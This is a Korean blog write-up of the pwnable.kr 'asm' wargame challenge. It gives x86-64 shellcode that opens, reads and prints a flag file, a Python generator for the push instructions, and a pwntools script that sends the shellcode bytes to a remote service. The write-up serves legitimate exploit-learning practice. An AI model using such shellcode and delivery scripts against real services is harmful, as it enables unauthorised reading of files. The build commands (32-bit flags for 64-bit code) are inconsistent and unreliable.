[Toddler's Bottle] asm
ssh로 접속하면 아래와 같은 파일들을 볼 수 있다.
아래 사진은 소스코드의 일부이다.
open(), read(), write()를 이용하여 플래그 파일을 읽는 쉘코드를 입력하면 된다.
section .text
global _start
_start:
push 0x0
mov rax, 0x676e6f306f306f
push rax
mov rax, 0x306f306f306f306f
push rax
mov rax, 0x3030303030303030
push rax
mov rax, 0x303030306f6f6f6f
push rax
mov rax, 0x6f6f6f6f6f6f6f6f
push rax
mov rax, 0x6f6f6f6f6f6f6f6f
push rax
mov rax, 0x6f6f6f3030303030
push rax
mov rax, 0x3030303030303030
push rax
mov rax, 0x3030303030303030
push rax
mov rax, 0x303030306f6f6f6f
push rax
mov rax, 0x6f6f6f6f6f6f6f6f
push rax
mov rax, 0x6f6f6f6f6f6f6f6f
push rax
mov rax, 0x6f6f6f6f6f6f6f6f
push rax
mov rax, 0x6f6f6f6f6f6f6f6f
push rax
mov rax, 0x6f6f6f6f6f6f6f6f
push rax
mov rax, 0x6f6f6f6f6f6f6f6f
push rax
mov rax, 0x6f6f6f6f6f6f6f6f
push rax
mov rax, 0x6f6f6f6f6f6f6f6f
push rax
mov rax, 0x6f6f6f6f6f6f6f6f
push rax
mov rax, 0x6c5f797265765f73
push rax
mov rax, 0x695f656d616e5f65
push rax
mov rax, 0x6c69665f6568745f
push rax
mov rax, 0x7972726f732e656c
push rax
mov rax, 0x69665f736968745f
push rax
mov rax, 0x646165725f657361
push rax
mov rax, 0x656c705f656c6966
push rax
mov rax, 0x5f67616c665f726b
push rax
mov rax, 0x2e656c62616e7770
push rax
mov rax, 0x5f73695f73696874
push rax ; push filepath
mov rdi, rsp
xor rax, rax
xor rsi, rsi
xor rdx, rdx
mov rax, 0x2 ; open()
syscall
mov rdi, rax
mov rsi, rsp
mov rdx, 0x100
mov rax, 0x0 ; read()
syscall
mov rdi, 0x1
mov rsi, rsp
mov rdx, 0x100
mov rax, 0x1 ; write()
syscall
xor rdi, rdi
mov rax, 0x3c ; exit()
syscall
작성한 쉘코드를 보면 open(), read(), write(), exit()을 차례로 호출하는 것을 볼 수 있다.
먼저 64비트이기 때문에
systemcall table을 참고하여 rax에 시스템콜 번호를 넣어준다.
인자들은 rdi, rsi, rdx, rcx에 차례로 넣어주었다.
read()와 write()의 두 번째 인자인 버퍼는 rsp로 설정하였다.
파일명은 스택에 push한 뒤, rsp를 넘겨주는 방법을 이용하였다.
파일명이 길기 때문에 python을 이용하였다.
#!/usr/bin/env python
l = "this_is_pwnable.kr_flag_file_please_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0000000000000000000000000ooooooooooooooooooooooo000000000000o0o0o0o0o0o0ong"
p = ['push 0x676e6f306f306f']
i = -8
while True:
tmp = ""
for j in range(8):
tmp += hex(ord(l[i-j]))[2:]
p.append('mov rax, 0x' + tmp + '\npush rax')
i -= 8
if i-8 < -232:
break
for i in p:
print i
이제 아래 명령어로 쉘코드를 컴파일한다.
nasm -f elf32 shell.s
ld -m elf_i386 -o shell shell.o
#!/usr/bin/env python
from pwn import *p = remote("0.0.0.0", 9026)print p.read()p.send("\x6a\x00\x48\xb8\x6f\x30\x6f\x30\x6f\x6e\x67\x00\x50\x48\xb8\x6f\x30\x6f\x30\x6f\x30\x6f\x30\x50\x48\xb8\x30\x30\x30\x30\x30\x30\x30\x30\x50\x48\xb8\x6f\x6f\x6f\x6f\x30\x30\x30\x30\x50\x48\xb8\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x50\x48\xb8\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x50\x48\xb8\x30\x30\x30\x30\x30\x6f\x6f\x6f\x50\x48\xb8\x30\x30\x30\x30\x30\x30\x30\x30\x50\x48\xb8\x30\x30\x30\x30\x30\x30\x30\x30\x50\x48\xb8\x6f\x6f\x6f\x6f\x30\x30\x30\x30\x50\x48\xb8\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x50\x48\xb8\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x50\x48\xb8\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x50\x48\xb8\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x50\x48\xb8\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x50\x48\xb8\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x50\x48\xb8\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x50\x48\xb8\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x50\x48\xb8\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x50\x48\xb8\x73\x5f\x76\x65\x72\x79\x5f\x6c\x50\x48\xb8\x65\x5f\x6e\x61\x6d\x65\x5f\x69\x50\x48\xb8\x5f\x74\x68\x65\x5f\x66\x69\x6c\x50\x48\xb8\x6c\x65\x2e\x73\x6f\x72\x72\x79\x50\x48\xb8\x5f\x74\x68\x69\x73\x5f\x66\x69\x50\x48\xb8\x61\x73\x65\x5f\x72\x65\x61\x64\x50\x48\xb8\x66\x69\x6c\x65\x5f\x70\x6c\x65\x50\x48\xb8\x6b\x72\x5f\x66\x6c\x61\x67\x5f\x50\x48\xb8\x70\x77\x6e\x61\x62\x6c\x65\x2e\x50\x48\xb8\x74\x68\x69\x73\x5f\x69\x73\x5f\x50\x48\x89\xe7\x48\x31\xc0\x48\x31\xf6\x48\x31\xd2\xb8\x02\x00\x00\x00\x0f\x05\x48\x89\xc7\x48\x89\xe6\xba\x00\x01\x00\x00\xb8\x00\x00\x00\x00\x0f\x05\xbf\x01\x00\x00\x00\x48\x89\xe6\xba\x00\x01\x00\x00\xb8\x01\x00\x00\x00\x0f\x05\x48\x31\xff\xb8\x3c\x00\x00\x00\x0f\x05")p.interactive()
실행하면 아래와 같이 플래그를 얻을 수 있다.
'Wargame > pwnable.kr' 카테고리의 다른 글
| pwnable.kr cmd2 (0) | 2019.02.01 |
|---|---|
| pwnable.kr cmd1 (0) | 2019.02.01 |
| pwnable.kr passcode (0) | 2019.02.01 |
| pwnable.kr random (0) | 2019.02.01 |
| pwnable.kr collision (0) | 2019.02.01 |
댓글